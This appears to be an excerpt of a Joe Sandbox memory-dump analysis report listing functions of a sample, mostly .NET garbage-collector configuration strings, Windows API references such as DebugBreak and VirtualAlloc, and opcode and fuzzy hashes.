GCGen0MaxBudget, xrefs: 00007FF67FA51DFF
GCLowSkipRatio, xrefs: 00007FF67FA51E3B
System.GC.HeapCount, xrefs: 00007FF67FA51C58
System.GC.HeapAffinitizeRanges, xrefs: 00007FF67FA51D72, 00007FF67FA51D93
GCEnabledInstructionSets, xrefs: 00007FF67FA522A3
BGCMLki, xrefs: 00007FF67FA52105
LOHThreshold, xrefs: 00007FF67FA51BFE
BGCG2RatioStep, xrefs: 00007FF67FA521B9
System.GC.HeapHardLimitSOH, xrefs: 00007FF67FA521D7
BGCFLki, xrefs: 00007FF67FA52051
System.GC.MaxHeapCount, xrefs: 00007FF67FA51C7A
System.GC.NoAffinitize, xrefs: 00007FF67FA51AF0
ForceCompact, xrefs: 00007FF67FA51A89
GCLargePages, xrefs: 00007FF67FA51BB2
HeapVerifyLevel, xrefs: 00007FF67FA51BC2
BGCSpinCount, xrefs: 00007FF67FA51C1C
GCHeapHardLimitPercent, xrefs: 00007FF67FA51E8A
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF67FA5223D
BGCFLEnableSmooth, xrefs: 00007FF67FA5215F
ConcurrentGC, xrefs: 00007FF67FA51A55
BGCFLSweepGoal, xrefs: 00007FF67FA51FF7
System.GC.LargePages, xrefs: 00007FF67FA51BA8
System.GC.Server, xrefs: 00007FF67FA51A1B
BGCFLkp, xrefs: 00007FF67FA52033
BGCFLSweepGoalLOH, xrefs: 00007FF67FA52015
NoAffinitize, xrefs: 00007FF67FA51B02
RetainVM, xrefs: 00007FF67FA51ABC
System.GC.HeapHardLimitLOH, xrefs: 00007FF67FA521F9
ServerGC, xrefs: 00007FF67FA51A2A
BGCFLff, xrefs: 00007FF67FA5208D
ConfigLogFile, xrefs: 00007FF67FA51F6F
LatencyLevel, xrefs: 00007FF67FA51CF6
System.GC.HeapHardLimitPOH, xrefs: 00007FF67FA5221B
System.GC.DynamicAdaptationMode, xrefs: 00007FF67FA5236C
LogFile, xrefs: 00007FF67FA51F2B
CompactRatio, xrefs: 00007FF67FA51D32
BGCSpin, xrefs: 00007FF67FA51C3A
GCHeapAffinitizeRanges, xrefs: 00007FF67FA51D7E, 00007FF67FA51D9F
GCHeapHardLimitSOH, xrefs: 00007FF67FA521E6
GCHeapHardLimitPOHPercent, xrefs: 00007FF67FA52290
GCTotalPhysicalMemory, xrefs: 00007FF67FA51E9D
GCGen1MaxBudget, xrefs: 00007FF67FA51E1D
GCLogFile, xrefs: 00007FF67FA51F1A
BGCMLkp, xrefs: 00007FF67FA520F2
GCHeapHardLimit, xrefs: 00007FF67FA51E68
GCDynamicAdaptationMode, xrefs: 00007FF67FA5237B
BGCMemGoal, xrefs: 00007FF67FA51FBB
GCHeapHardLimitLOH, xrefs: 00007FF67FA52208
GCName, xrefs: 00007FF67FA5230B, 00007FF67FA5232E
ConfigLogEnabled, xrefs: 00007FF67FA51B36
System.GC.ConserveMemory, xrefs: 00007FF67FA522C1
GCNumaAware, xrefs: 00007FF67FA51B57
HeapCount, xrefs: 00007FF67FA51C67
BGCFLSmoothFactor, xrefs: 00007FF67FA520AB
ConservativeGC, xrefs: 00007FF67FA51A68
BGCFLEnableFF, xrefs: 00007FF67FA5219B, 00007FF67FA522E3
Gen0Size, xrefs: 00007FF67FA51C9C
GCSpinCountUnit, xrefs: 00007FF67FA5234E
GCRegionSize, xrefs: 00007FF67FA51ED9
GCHeapHardLimitSOHPercent, xrefs: 00007FF67FA5224C
BGCFLkd, xrefs: 00007FF67FA5206F

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
API String ID: 0-799405152
Opcode ID: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
Instruction ID: 15769f63340ae6906198b994cbff7d468393478a04df4aa9f8b9d8b5f3d8966e
Opcode Fuzzy Hash: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
Instruction Fuzzy Hash: 44426176628A9781EB609B55F810EAA63A4FF86FD8F415132D98C47F24DF3CD205CB84

Function 00007FF67FA52750 Relevance: 109.2, Strings: 87, Instructions: 472COMMON

Download Yara Rule

Strings

GCHighMemPercent, xrefs: 00007FF67FA52BA6
GCHeapAffinitizeMask, xrefs: 00007FF67FA52B78
gcServer, xrefs: 00007FF67FA52762
GCRegionRange, xrefs: 00007FF67FA52CF6
BGCFLEnableTBH, xrefs: 00007FF67FA53001
GCBreakOnOOM, xrefs: 00007FF67FA5282C
GCCompactRatio, xrefs: 00007FF67FA52B48
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF67FA53134
BGCMemGoalSlack, xrefs: 00007FF67FA52DC3
GCHeapHardLimitLOHPercent, xrefs: 00007FF67FA5313B
System.GC.HeapHardLimitPercent, xrefs: 00007FF67FA52C9F
GCCpuGroup, xrefs: 00007FF67FA52900
GCMaxHeapCount, xrefs: 00007FF67FA52A54
GCLatencyMode, xrefs: 00007FF67FA52ACD
System.GC.HighMemoryPercent, xrefs: 00007FF67FA52B9F
GCProvModeStress, xrefs: 00007FF67FA52BCD
System.GC.CpuGroup, xrefs: 00007FF67FA528F9
System.GC.Concurrent, xrefs: 00007FF67FA52782
BGCFLTuningEnabled, xrefs: 00007FF67FA52D71
GCHeapHardLimitPOH, xrefs: 00007FF67FA530E6
System.GC.HeapHardLimit, xrefs: 00007FF67FA52C71
System.GC.HeapAffinitizeMask, xrefs: 00007FF67FA52B71
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF67FA53162
GCEnableSpecialRegions, xrefs: 00007FF67FA52D48
gcForceCompact, xrefs: 00007FF67FA527D7
BGCFLGradualD, xrefs: 00007FF67FA52F0B
BGCFLEnableKd, xrefs: 00007FF67FA52FAF
GCLatencyLevel, xrefs: 00007FF67FA52AF6
GCConfigLogEnabled, xrefs: 00007FF67FA528A9
System.GC.RetainVM, xrefs: 00007FF67FA527FF
BGCFLEnableKi, xrefs: 00007FF67FA52F86
GCGen0MaxBudget, xrefs: 00007FF67FA52BF6
GCLowSkipRatio, xrefs: 00007FF67FA52C48
System.GC.HeapCount, xrefs: 00007FF67FA52A1F
gcConservative, xrefs: 00007FF67FA527AF
GCEnabledInstructionSets, xrefs: 00007FF67FA53190
BGCMLki, xrefs: 00007FF67FA52F5D
BGCG2RatioStep, xrefs: 00007FF67FA53053
System.GC.HeapHardLimitSOH, xrefs: 00007FF67FA5307C
BGCFLki, xrefs: 00007FF67FA52E67
System.GC.MaxHeapCount, xrefs: 00007FF67FA52A4D
System.GC.NoAffinitize, xrefs: 00007FF67FA52854
GCLargePages, xrefs: 00007FF67FA5292D
BGCSpinCount, xrefs: 00007FF67FA529CD
GCHeapHardLimitPercent, xrefs: 00007FF67FA52CA6
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF67FA53106
GCNoAffinitize, xrefs: 00007FF67FA5285B
BGCFLEnableSmooth, xrefs: 00007FF67FA52FD8
BGCFLSweepGoal, xrefs: 00007FF67FA52DEC
System.GC.LargePages, xrefs: 00007FF67FA52926
System.GC.Server, xrefs: 00007FF67FA5275B
BGCFLkp, xrefs: 00007FF67FA52E3E
BGCFLSweepGoalLOH, xrefs: 00007FF67FA52E15
GCLogFileSize, xrefs: 00007FF67FA52B28
gcConcurrent, xrefs: 00007FF67FA52789
System.GC.HeapHardLimitLOH, xrefs: 00007FF67FA530AA
BGCFLff, xrefs: 00007FF67FA52EB9
GCLOHCompact, xrefs: 00007FF67FA5297B
GCgen0size, xrefs: 00007FF67FA52A7B
HeapVerify, xrefs: 00007FF67FA52953
System.GC.HeapHardLimitPOH, xrefs: 00007FF67FA530DF
System.GC.DynamicAdaptationMode, xrefs: 00007FF67FA53239
BGCSpin, xrefs: 00007FF67FA529F6
GCLOHThreshold, xrefs: 00007FF67FA529A4
GCWriteBarrier, xrefs: 00007FF67FA531E7
GCHeapHardLimitSOH, xrefs: 00007FF67FA53083
GCHeapHardLimitPOHPercent, xrefs: 00007FF67FA53169
GCTotalPhysicalMemory, xrefs: 00007FF67FA52CCD
GCGen1MaxBudget, xrefs: 00007FF67FA52C1F
BGCMLkp, xrefs: 00007FF67FA52F34
GCHeapHardLimit, xrefs: 00007FF67FA52C78
GCHeapCount, xrefs: 00007FF67FA52A26
GCDynamicAdaptationMode, xrefs: 00007FF67FA53240
BGCMemGoal, xrefs: 00007FF67FA52D9A
GCHeapHardLimitLOH, xrefs: 00007FF67FA530B1
GCLogEnabled, xrefs: 00007FF67FA52881
System.GC.ConserveMemory, xrefs: 00007FF67FA531B9
GCNumaAware, xrefs: 00007FF67FA528D1
GCSegmentSize, xrefs: 00007FF67FA52AA4
GCConserveMemory, xrefs: 00007FF67FA531C0
BGCFLSmoothFactor, xrefs: 00007FF67FA52EEB
BGCFLEnableFF, xrefs: 00007FF67FA5302A
GCSpinCountUnit, xrefs: 00007FF67FA53210
GCRegionSize, xrefs: 00007FF67FA52D28
GCHeapHardLimitSOHPercent, xrefs: 00007FF67FA5310D
GCRetainVM, xrefs: 00007FF67FA52806
BGCFLkd, xrefs: 00007FF67FA52E90

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: strcmp
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
API String ID: 1004003707-1294421646
Opcode ID: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
Instruction ID: c6577823c85a3572753d0965b1828cc2b9c4f973e4f32d8afd2e84ada17c91b2
Opcode Fuzzy Hash: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
Instruction Fuzzy Hash: E262B066D3DA8794FA00DB59AC408B327A1BF96F94B844236C48DD7272EE7CE159C7C0

Function 00007FF67FA81200 Relevance: 21.8, APIs: 14, Instructions: 792COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF67FA81580
DebugBreak.KERNEL32 ref: 00007FF67FA81598
DebugBreak.KERNEL32 ref: 00007FF67FA81647
DebugBreak.KERNEL32 ref: 00007FF67FA81685
DebugBreak.KERNEL32 ref: 00007FF67FA816D5
DebugBreak.KERNEL32 ref: 00007FF67FA81726
DebugBreak.KERNEL32 ref: 00007FF67FA8178B
DebugBreak.KERNEL32 ref: 00007FF67FA817E1
DebugBreak.KERNEL32 ref: 00007FF67FA81A18
DebugBreak.KERNEL32 ref: 00007FF67FA81B09
DebugBreak.KERNEL32 ref: 00007FF67FA81B8B
DebugBreak.KERNEL32 ref: 00007FF67FA81BC4
DebugBreak.KERNEL32 ref: 00007FF67FA81BF8
DebugBreak.KERNEL32 ref: 00007FF67FA81CD7

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
Instruction ID: 046fe560e6abc1796ae780e1f68e9efd2d00ccfa7407ecafbe86f7dada7eda03
Opcode Fuzzy Hash: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
Instruction Fuzzy Hash: 78729C63A296C2C2EA628B15D040BB967E0FF45BA4F184635DE5D877D5DFBCE480C780

Function 00007FF67FA51830 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 00007FF67FA5186C
GetCurrentProcess.KERNEL32 ref: 00007FF67FA51894
OpenProcessToken.ADVAPI32 ref: 00007FF67FA518A7
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF67FA518CC
GetLastError.KERNEL32 ref: 00007FF67FA518D4
CloseHandle.KERNEL32 ref: 00007FF67FA518E1
GetLargePageMinimum.KERNEL32 ref: 00007FF67FA518F6
VirtualAlloc.KERNEL32 ref: 00007FF67FA51927
GetCurrentProcess.KERNEL32 ref: 00007FF67FA51933
VirtualAllocExNuma.KERNEL32 ref: 00007FF67FA51953

Strings

SeLockMemoryPrivilege, xrefs: 00007FF67FA51865

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
String ID: SeLockMemoryPrivilege
API String ID: 1752251271-475654710
Opcode ID: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
Instruction ID: 72f241207d3518de34b19bccb4b902aa8f295b2b9019e991188fd648378fb91a
Opcode Fuzzy Hash: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
Instruction Fuzzy Hash: 48318127A2C742C6FB209B61F414B7A67A5EF85B98F044035EA8D97754DE3CD4888B80

Function 00007FF67FA5EFE0 Relevance: 13.4, APIs: 5, Strings: 2, Instructions: 1181threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF67FA5F687
SwitchToThread.KERNEL32 ref: 00007FF67FA5F7F0
SwitchToThread.KERNEL32 ref: 00007FF67FA5F7F9
SwitchToThread.KERNEL32 ref: 00007FF67FA5F823

Part of subcall function 00007FF67FA51630: QueryPerformanceCounter.KERNEL32 ref: 00007FF67FA51639

DebugBreak.KERNEL32 ref: 00007FF67FA5F95E

Strings

Concurrent GC: Restarting EE, xrefs: 00007FF67FA5F66A
GCHeap::Promote: Promote GC Root *%p = %p MT = %pT, xrefs: 00007FF67FA5FB15

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: SwitchThread$BreakCounterDebugPerformanceQuery
String ID: GCHeap::Promote: Promote GC Root *%p = %p MT = %pT$Concurrent GC: Restarting EE
API String ID: 30421299-2108734148
Opcode ID: 6615c7b4db84cdefcc6dfb6fb544c900babefb5ec8c8e420ffc49294f2f83981
Instruction ID: 67f4ecd1e61702bcd832cf7688f74bc62b44ed1d9477449a71696af2362ab605
Opcode Fuzzy Hash: 6615c7b4db84cdefcc6dfb6fb544c900babefb5ec8c8e420ffc49294f2f83981
Instruction Fuzzy Hash: 55C2C063A29743C5FA558B29E450B7A27A4BF45B98F184236DE5DC37A1EF3CE481C380

Function 00007FF67FA61520 Relevance: 13.1, APIs: 8, Instructions: 1052threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF67FA62074
DebugBreak.KERNEL32 ref: 00007FF67FA62087
SwitchToThread.KERNEL32 ref: 00007FF67FA62238
SwitchToThread.KERNEL32 ref: 00007FF67FA62262
SwitchToThread.KERNEL32 ref: 00007FF67FA622EE
SwitchToThread.KERNEL32 ref: 00007FF67FA6248C
SwitchToThread.KERNEL32 ref: 00007FF67FA62495
SwitchToThread.KERNEL32 ref: 00007FF67FA624BF

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: SwitchThread$BreakDebug
String ID:
API String ID: 223621376-0
Opcode ID: e5cb054ff7b66c56e3d29fbfe9d471ef182207bf6629e1d95f516b43b2c9ee66
Instruction ID: c5b1197432315295f5efff5bb491e7d8e073d76ce3f3e8b85b46ab5645f93dc4
Opcode Fuzzy Hash: e5cb054ff7b66c56e3d29fbfe9d471ef182207bf6629e1d95f516b43b2c9ee66
Instruction Fuzzy Hash: 47B25C33A28646C5FA648B299440B7A2BE4BF56FA4F145235E95DC77E1EF3CE480C380

Function 00007FF67FA7F960 Relevance: 10.9, APIs: 7, Instructions: 416COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67FA7D0E0: EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF67FA7AE19,?,?,?,00007FF67FA6CA43), ref: 00007FF67FA7D139
Part of subcall function 00007FF67FA7D0E0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,00007FF67FA7AE19,?,?,?,00007FF67FA6CA43), ref: 00007FF67FA7D14F

DebugBreak.KERNEL32 ref: 00007FF67FA7FE1E
DebugBreak.KERNEL32 ref: 00007FF67FA7FE36
DebugBreak.KERNEL32 ref: 00007FF67FA7FE4E
DebugBreak.KERNEL32 ref: 00007FF67FA7FE6C
DebugBreak.KERNEL32 ref: 00007FF67FA7FE8C
DebugBreak.KERNEL32 ref: 00007FF67FA7FEA0
DebugBreak.KERNEL32 ref: 00007FF67FA7FF51

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BreakDebug$CriticalSection$EnterLeave
String ID:
API String ID: 3888577265-0
Opcode ID: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
Instruction ID: cc2f6e140c590855f2d0561bf4764b8fe7d3892b2bb8a008c93143c3a1aea040
Opcode Fuzzy Hash: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
Instruction Fuzzy Hash: 0712A923A39B87C1EA618B15E450F7A27A0FF85B88F244135DA5D97399DF3CE580C2E0

Function 00007FF67FA7A7B0 Relevance: 10.9, APIs: 7, Instructions: 376COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF67FA792AB), ref: 00007FF67FA7A909
EnterCriticalSection.KERNEL32 ref: 00007FF67FA7AC36
LeaveCriticalSection.KERNEL32 ref: 00007FF67FA7AC50
DebugBreak.KERNEL32 ref: 00007FF67FA7ACFD
DebugBreak.KERNEL32 ref: 00007FF67FA7AD1A
DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF67FA792AB), ref: 00007FF67FA7AD35
DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF67FA792AB), ref: 00007FF67FA7AD4E

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BreakDebug$CriticalSection$EnterLeave
String ID:
API String ID: 3888577265-0
Opcode ID: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
Instruction ID: 82bf8e6db5daf164dc6ecb7207637cbc249a6047647999bd0e7d4bf6c6c854f2
Opcode Fuzzy Hash: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
Instruction Fuzzy Hash: B402AC63A29B82E6EB548B25D450F797BA4FF45B84F084136CA4D837A9DF3CE491C390
